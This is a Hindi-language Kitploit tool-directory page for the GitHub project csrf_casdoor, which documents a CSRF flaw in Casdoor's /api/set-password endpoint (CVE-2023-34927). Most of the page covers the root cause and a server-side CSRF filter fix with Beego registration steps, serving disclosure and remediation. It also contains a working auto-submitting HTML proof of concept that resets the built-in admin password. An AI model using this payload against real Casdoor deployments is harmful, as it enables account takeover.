Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
csrf_casdoor | Kitploit
उपकरण/GitHubGitHub/vanlam2001/csrf_casdoor
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubvanlam2001/csrf_casdoor

csrf_casdoor

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

कैसदूर – क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)

सारांश

  • भेद्यता: /api/set-password में CSRF, जो बिना सहमति के पासवर्ड बदलने की अनुमति देता है।
  • प्रभावित संस्करण: सॉफ़्टवेयर के सभी संस्करण प्रभावित हैं। फ़िलहाल कोई पैच किया गया रिलीज़ उपलब्ध नहीं है।
  • CVE: CVE-2023-34927 (नवीनतम अभी तक निर्धारित नहीं हुआ)।
  • एक्सप्लॉइट लेखक: Van Lam Nguyen.
  • परीक्षण किया गया: Windows पर

प्रभाव

  • यदि कोई पीड़ित कैसदूर में लॉग इन है, तो एक क्रॉस-साइट POST पीड़ित का पासवर्ड बदल सकता है (जैसे, built-in/admin), जिससे खाता अपने कब्ज़े में लिया जा सकता है।

हमले की पूर्वापेक्षाएँ

  • पीड़ित प्रमाणित है और उसके पास एक मान्य casdoor_session_id कुकी है।
  • पीड़ित एक दुर्भावनापूर्ण पेज पर जाता है जो स्वतः /api/set-password पर POST जमा करता है।

प्रमाण की अवधारणा (Proof of Concept)

root@kitploit:~
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built&#45;in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>
    history.pushState('', '', '/');
    document.forms[0].submit();
</script>
</html>

मूल कारण

  • /api/* के अंतर्गत आने वाले राज्य-परिवर्तनकारी एंडपॉइंट कुकी-प्रमाणित अनुरोधों को बिना समान-मूल जाँच (Origin/Referer) या CSRF टोकन लागू किए स्वीकार करते हैं।

सुधार का अवलोकन

  • /api/* के अंतर्गत क्रॉस-साइट, कुकी-आधारित POST/PUT/DELETE/PATCH अनुरोधों को अस्वीकार करने के लिए एक सर्वर-साइड CSRF फ़िल्टर जोड़ें।
  • उन अनुरोधों को अनुमति दें जिनमें स्पष्ट गैर-कुकी प्रमाणीकरण हो (जैसे, Authorization, Basic auth, क्लाइंट क्रेडेंशियल्स, या accessToken) या बिना ब्राउज़र सत्र कुकी वाले अनुरोध (विशिष्ट सर्वर-से-सर्वर कॉल)।

कार्यान्वयन

  • csrf_filter.go में लागू routers.CSRFFilter का उपयोग करें। यह फ़िल्टर:
    • राज्य-परिवर्तनकारी न होने वाली विधियों के लिए तुरंत लौट आता है।
    • स्पष्ट गैर-कुकी प्रमाणीकरण वाले अनुरोधों को अनुमति देता है।
    • सत्र कुकी उपस्थित होने पर और मूल (origin) होस्ट से मेल न खाने पर क्रॉस-साइट अनुरोधों को अवरुद्ध करता है।

कैसदूर में कैसे एकीकृत करें

  1. csrf_filter.go को कैसदूर प्रोजेक्ट के मौजूदा routers पैकेज में कॉपी करें। इस फ़ाइल में कुछ भी संशोधित या हटाएँ नहीं।
  2. फ़िल्टर को HTTP पाइपलाइन में जल्दी पंजीकृत करें (main के अंदर):
    root@kitploit:~
    // Beego v1 style
    beego.InsertFilter("/api/*", beego.BeforeRouter, routers.CSRFFilter)
    
    // If your project uses Beego v2 and imports as `web`:
    // web.InsertFilter("/api/*", web.BeforeRouter, routers.CSRFFilter)
    

सत्यापन

  • फ़िल्टर पंजीकृत करने के बाद, लॉग इन करते हुए उपरोक्त PoC को दोबारा चलाएँ। अनुरोध को Unauthorized operation के साथ अस्वीकार कर दिया जाना चाहिए और सर्वर को CSRF check failed लॉग करना चाहिए।
  • क्रॉस-ओरिजिन API कॉल जिनमें Authorization हेडर या accessToken पैरामीटर शामिल हैं, काम करते रहने चाहिए।

रिपॉजिटरी फ़ाइलें

  • csrf_filter.go: CSRF फ़िल्टर जिसे कैसदूर के routers पैकेज में कॉपी करना है।
  • poc.html: CSRF हमले को दोहराने वाला न्यूनतम पेज।
  • README.md: यह दस्तावेज़ जो भेद्यता और सुधार के चरणों का वर्णन करता है।

संदर्भ

  • Casdoor: https://casdoor.org/
  • संस्करण: https://github.com/casdoor/casdoor/releases
  • https://vulmon.com/vulnerabilitydetails?qid=CVE-2023-34927

वीडियो

  • Youtube: https://youtu.be/N5VENgiObjY
टूल डाउनलोड करें